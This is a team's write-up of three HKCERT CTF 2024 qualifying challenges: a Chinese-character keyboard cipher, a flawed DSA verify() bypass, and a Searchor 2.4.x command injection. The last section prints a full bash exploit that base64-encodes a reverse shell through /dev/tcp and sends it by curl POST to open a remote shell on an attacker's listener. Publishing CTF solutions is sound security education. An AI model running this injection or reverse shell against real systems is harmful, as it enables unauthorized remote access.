# Writeup for HKCERT CTF 2024 Qualifying Round (Team S0064) [TOC] ## Misc/Tuning Keyboard 5 solved by @sirius9121, @tebbo ### Challenge Oveview We were tasked with deciphering a Chinese passage to locate the flag.  ### Solution First we observe Tuning Keyboard 5.5: When the [?] button on the bottom left is clicked, the number "5.5" appears. After testing, it is observed that for each "木" typed on the board, an additional "5" appears, i.e. "木水木木" generates "5.55".  This is shown after only "金" is typed into the box. It is further observed that the five elements can also be converted into other symbols: 火 -> "(", 土 -> ")", 金 -> "^" and 水 -> "."  is also displayed when the character "森" is inputted, showing that complex characters that are made from the five elements can be translated accordingly. Therefore, we can copy the text inside Tuning Keyboard 5 and convert the corresponding characters to code.  However, inputting it in Python doesn't work!  "lol" Therefore, it is required to use another language. Therefore, https://onecompiler.com/ provided PHP compiler which can run the code! The code appears after the PHP code was run. ## Crypto/Almost DSA solved by @rioho ### Challenge Oveview The flag is given by os.getenv which requires passing the verify() function in the netcat server. ### Solution The one byte security flaw lies in verify(), the assertions "0<r<p" and "0<s<p", both p are originally intended to be q. Since w is the inverse modulo of user input s and given value q, inputtng s as q evaluates w to 0, which then effectivly evaluates u1 and u2 to 0 as they invlove multiplying by w. ```python v = (g ** u1 %p) * (y ** u2 % p) % p % q ``` can be simplified to ```python v = (1 % p) * (1 % p) % p % q v = 1 ``` Setting `r = 1` passes `assert v == r` Since p is derived from q as `r * q + 1` (where r is random integer) Setting `s = p-1` also passes both assertions Flag was returned after entering the mentioned numbers into the netcat server. ## Misc/B6ACP solved by @rioho ### Challenge Oveview We were required to get flag at the home folder of the user. The challange was provided with a step-by-step guide and a website.  ### Solution Given that (in the step-by-step guide) there is a vulnerability in the searchor/2.4.1, we were able to find an exploit script online in [this github](https://github.com/nikn0laty/Exploit-for-Searchor-2.4.0-Arbitrary-CMD-Injection). However, we were not able to get access to the console with this script. After further analyzing with burpsuite, we figured out that the website POST in / instead of /search and uses e and q for the parameters.  We modified the script as below: ```bash= #!/bin/bash - default_port="9008" port="${3:-$default_port}" rev_shell_b64=$(echo -ne "bash -c 'bash -i >& /dev/tcp/$2/${port} 0>&1'" | base64) evil_cmd="',__import__('os').system('echo ${rev_shell_b64}|base64 -d|bash -i')) # junky comment" plus="+" echo "---[Reverse Shell Exploit for Searchor <= 2.4.2 (2.4.0)]---" if [ -z "${evil_cmd##*$plus*}" ] then evil_cmd=$(echo ${evil_cmd} | sed -r 's/[+]+/%2B/g') fi if [ $# -lt 2 ] then echo "[!] Please specify a IP address of target and IP address/Port of attacker for Reverse Shell, for example: ./exploit.sh <TARGET> <ATTACKER> <PORT> [9001 by default]" exit 1 else echo "[*] Input target is $1" echo "[*] Input attacker is $2:${port}" echo "[*] Run the Reverse Shell... Press Ctrl+C after successful connection" curl -s -X POST $1/ -d "e=Google&q=${evil_cmd}" 1> /dev/null fi ``` After opening a netcat listener on my vps and running the exploit script, we were able to get the console running and get flag.